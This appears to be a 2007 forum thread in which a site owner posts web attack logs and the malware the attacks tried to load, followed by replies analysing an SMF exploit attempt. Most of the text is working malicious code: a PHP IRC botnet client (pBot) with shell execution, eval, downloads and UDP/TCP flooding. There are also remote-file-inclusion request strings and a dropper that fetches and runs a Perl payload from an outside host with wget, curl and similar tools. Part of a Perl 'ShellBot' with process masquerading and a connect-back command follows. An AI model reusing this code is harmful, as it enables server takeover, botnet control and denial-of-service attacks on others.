{//RESTART case "restart": $this->send("QUIT :restart"); fclose($this->conn); $this->start(); break; //MAIL case "mail": //mail to from subject message if(count($mcmd)>4) { $header = "From: <".$mcmd[2].">"; if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) { $this->privmsg($this->config['chan'],"[\2mail\2]: Unable to send"); } else { $this->privmsg($this->config['chan'],"[\2mail\2]: Message sent to \2".$mcmd[1]."\2"); } } break; //DNS case "dns": if(isset($mcmd[1])) { $ip = explode(".",$mcmd[1]); if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) { $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); } else { $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); } } break; //INFO case "info": $this->privmsg($this->config['chan'],"[\2info\2]: [\2httpd\2: ".$_SERVER['SERVER_SOFTWARE']."] [\2docroot\2: ".$_SERVER['DOCUMENT_ROOT']."] [\2domain\2: ".$_SERVER['SERVER_NAME']."] [\2admin\2: ".$_SERVER['SERVER_ADMIN']."] [\2url\2:".$_SERVER['REQUEST_URI']."]"); break; //COMMAND case "cmd": if(isset($mcmd[1])) { $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $this->privmsg($this->config['chan'],"[\2cmd\2]: $command"); $pipe = popen($command,"r"); while(!feof($pipe)) { $pbuf = trim(fgets($pipe,512)); if($pbuf != NULL) $this->privmsg($this->config['chan']," : $pbuf"); } pclose($pipe); } break; // SET NICK BASED ON HTTPD SERVER TYPE case "rndnick": $this->set_nick(); break; //SEND A MSG,COMMAND case "raw": $this->send(strstr($msg,$mcmd[1])); break; // UHHH, THIS DOES *SOMETHING* case "php": $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); break; // EXECUTE A COMMAND FROM THE SHELL case "exec": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $exec = shell_exec($command); $ret = explode("\n",$exec); $this->privmsg($this->config['chan'],"[\2exec\2]: $command"); for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i])); break; // PORTSCAN SOME SHIT case "pscan": // .pscan 127.0.0.1 6667 if(count($mcmd) > 2) { if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2"); else $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2"); } break; // CHANGE IRC SERVERS case "ud.server": // .udserver <server> <port> [password] if(count($mcmd)>2) { $this->config['server'] = $mcmd[1]; $this->config['port'] = $mcmd[2]; if(isset($mcmcd[3])) { $this->config['pass'] = $mcmd[3]; $this->privmsg($this->config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]." Pass: ".$mcmd[3]); } else { $this->privmsg($this->config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]); } } break; // DOWNLOAD STUFF case "download": if(count($mcmd) > 2) { if(!$fp = fopen($mcmd[2],"w")) { $this->privmsg($this->config['chan'],"[\2download\2]: Cannot download, permission denied."); } else { if(!$get = file($mcmd[1])) { $this->privmsg($this->config['chan'],"[\2download\2]: Unable to download from \2".$mcmd[1]."\2"); } else { for($i=0;$i<=count($get);$i++) { fwrite($fp,$get[$i]); } $this->privmsg($this->config['chan'],"[\2download\2]: File \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2"); } fclose($fp); } } break; // QUIT case "die": $this->send("QUIT :die command from $nick"); fclose($this->conn); exit; case "logout": $this->log_out($host); $this->privmsg($this->config['chan'],"[\2auth\2]: $nick logged out"); break; // FLOOD UDP case "udpflood": if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); } break; // FLOOD TCP case "tcpflood": if(count($mcmd)>5) { $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); } break; } } } break; } } } $old_buf = $this->buf; } $this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "[X]";
else
$this->nick = "[U]";
}
else
{
$this->nick = "[C]";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2udpflood\2]: Floodando $host durante $time segundos com pacotes de $packetsize bytes");// TRANSL: FLOOD HOST DURATION $time SECONDS WITH PACKETS OF $packetsize BYTES (portuguses again) $packet = ""; for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } $timei = time(); $i = 0; while(time()-$timei < $time) { $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); fwrite($fp,$packet); fclose($fp); $i++; } $env = $i * $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel); $env = round($env); $this->privmsg($this->config['chan'],"[\2udpflood\2]: Flood concluido: $env MB enviados / Velocidade media: $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2tcpflood\2]: Sending $packets packets to $host:$port. Packet size: $packetsize");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2tcpflood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2tcpflood\2]: Finished sending $packets packets to $host:$port.");
}
}// GO GO GADGET pBot!!!!
$bot = new pBot;
$bot->start();?>
NEW ATTACK, #2:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Guest : 213.139.211.68 : July 14, 2007, 08:06:28 PM
/forums/index.php?board=13;action=display;threadid=http%3A%2F%2Fwww.krippenverein.de%2Farchiv%2Fimages%2Finc%2F
This topic doesn't exist on this board. - "http://www.krippenverein.de/archiv/images/inc/"
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-ANOTHER, #3:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
71.29.236.111 - - [02/Jul/2007:18:14:06 -0500] "GET //help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://dvl.by.ru/cmd/r57shell.txt? HTTP/1.1" 404 294===== malcode:
<?php
//
/
/ # # # #
/ # # # #
/ # # # #
/ # ## #### ## #
/ ## ## ###### ## ##
/ ## ## ###### ## ##
/ ## ## #### ## ##
/ ### ############ ###
/ ########################
/ ##############
/ ######## ########## #######
/ ### ## ########## ## ###
/ ### ## ########## ## ###
/ ### # ########## # ###
/ ### ## ######## ## ###
/ ## # ###### # ##
/ ## # #### # ##
/ ## ##
/
/
/
/ r57shell.php - скрипт на пхп позволяющий вам выполнять системные команды на сервере через браузер
/ Вы можете скачать новую версию на нашем сайте: http://rst.void.ru
/ Версия: 1.3 (05.03.2006)
/~~~~~~~~~~/
/Отдельная благодарность за помощь и идеи: blf, phoenix, virus, NorD и всем чертям из RST/GHC.
/Если у Вас есть какие-либо идеи по поводу того какие функции следует добавить в скрипт то пишите
/на rst@void.ru. Все предложения будут рассмотрены.
//~~~~~~~~~~
/ (c)oded by 1dt.w0lf
/ RST/GHC http://rst.void.ru , http://ghc.ru
/ ANY MODIFIED REPUBLISHING IS RESTRICTED
/**********************************/
/ ~~~ Настройки | Options ~~~ */include("http://dvl.by.ru/box.txt");
///INCLUDE FILE CONTAINS:
/* <?
echo('vulnerable');
shell_exec('cd /tmp;wget http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;curl -O crewcorp.txt http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;lwp-download http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;lynx -source http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;fetch http://dvl.by.ru/crewcorp.txt;crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;GET http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;wget http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;curl -O box.txt http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;lwp-download http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;lynx -source http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;fetch http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;GET http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
?> */////MORE- "crewcorp.txt" CONTAINS:
/*#!/usr/bin/perl
ShellBOT by: devil__
Greetz: Puna, Kelserific
Comandos:
@oldpack <ip> <bytes> <tempo>;
@udp <ip> <porta> <tempo>;
@fullportscan <ip> <porta inicial> <porta final>;
@conback <ip> <porta>
@download <url> <arquivo a ser salvo>;
!estatisticas <on/off>;
!sair para finalizar o bot;
!novonick para trocar o nick do bot por um novo aleatorio;
!entra <canal> <tempo>
!sai <canal> <tempo>;
!pacotes <on/off>
@info
@xpl <kernel>
@sendmail <assunto> <remetente> <destinatario> <conteudo>
########## CONFIGURACAO ############
my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
my $processo = $ps[rand scalar @ps];$servidor='priv8.crewcorp.net' unless $servidor;
my $porta='3121';
my @canais=("#crew");
my @adms=("devil__","kelserific","ITAL0","Puna","wicked");Anti Flood ( 6/3 Recomendado )
my $linas_max=10;
my $sleep=3;my $nick = getnick();
my $ircname = getident2();
my $realname = "windows nt 5.1 build 2600";
#chop (my $realname =uname -n
);my $acessoshell = 1;
######## Stealth ShellBot ##########
my $prefixo = "!all";
my $estatisticas = 0;
my $pacotes = 1;
####################################my $VERSAO = '0.3b';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0";
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();#####################
Stealth Shellbot
#####################
sub getnick {
return "crew^".int(rand(1000));
}sub getident2 {
my $length=shift;
$length = 3 if ($length < 3);my @chars=('a'..'z','A'..'Z','1'..'9'); foreach (1..$length) { $randomstring.=$chars[rand @chars]; } return $randomstring;
}
#############################
B0tchZ na veia ehehe :P
#############################
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $[0];
print $socket "$[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}sub conectar {
my $meunick = $[0];
my $servidor_con = $[1];
my $porta_con = $_[2];my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;$IRC_socket->autoflush(1); $sel_cliente->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"</PRE>
-
found this on the web
Guest : 162.39.119.102 : July 12, 2007, 05:40:08 AM
/forums/index.php?board=15;action=display;threadid=2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???
Looks like he's trying a SMF exploit (he's doing it wrong, though), as Sources/Packages.php is a SMF file. Note that this will never work, accessing a SMF file like Sources/Packages.php directly won't work (it will just show a "hacking attempt..." message), and $sourcedir is always defined in Settings.php (which is always require()d)
-
I know no pages should do that but maybe it was someone who was just trying to test the security of your web-site, I get wrong requests on my web-site sometimes as well and as lonog as it doesn't breach my security it is OK now you can see whether or not it is really secure, and if it isn't secure, fix it. I sometimes get weirder requests than this on my web-site. (Of course, if I would test the security in this way, which I don't do unless I see something that looks like it could easily be exploited, I would instead add a message somewhere that says it is insecure and if the owner of this site can please correct it soon? If it is insecure I would notify the owner! Usually it is secure though, and that is good)